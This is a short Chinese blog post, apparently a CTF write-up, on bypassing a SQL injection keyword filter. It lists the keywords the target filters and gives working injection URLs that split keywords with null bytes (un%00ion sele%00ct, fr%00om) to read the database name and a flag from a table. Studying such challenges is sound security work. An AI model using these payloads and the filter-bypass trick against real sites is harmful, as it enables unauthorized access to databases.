sql注入之大过滤

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sql注入之大过滤相关的知识,希望对你有一定的参考价值。

首先来到测试网站:http://103.238.227.13:10087/?id=1


技术分享图片

通过最后两行发现有两个字段:



并且发现过滤了以下内容,郁闷。

table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','truncate','from','max','min','order','limit'

直接上sqlmap,然而并没有什么用。


开始尝试绕过:http://103.238.227.13:10087/?id=-1+union+select+1,database() %23

技术分享图片


发现不行。


继续测试:用00截断:

http://103.238.227.13:10087/?id=-1 un%00ion sele%00ct 1,database() %23


技术分享图片


发现成功了。


访问http://103.238.227.13:10087/?id=-1 un%00ion sele%00ct 1,  hash fr%00om sql3.key %23得到flag


技术分享图片






以上是关于sql注入之大过滤的主要内容,如果未能解决你的问题,请参考以下文章

安全测试 web安全测试 常规安全漏洞 可能存在SQL和JS注入漏洞场景分析。为什么自己没有找到漏洞,哪么可能存在漏洞场景是?SQL注入漏洞修复 JS注入漏洞修复 漏洞存在场景分析和修复示例(代码片段

代码审计之SQL注入

Java代码审计之SQL注入

PHP 代码审计之死磕 SQL 注入

JAVA代码审计之WebGoat靶场SQL注入

MyBatis如何防止SQL注入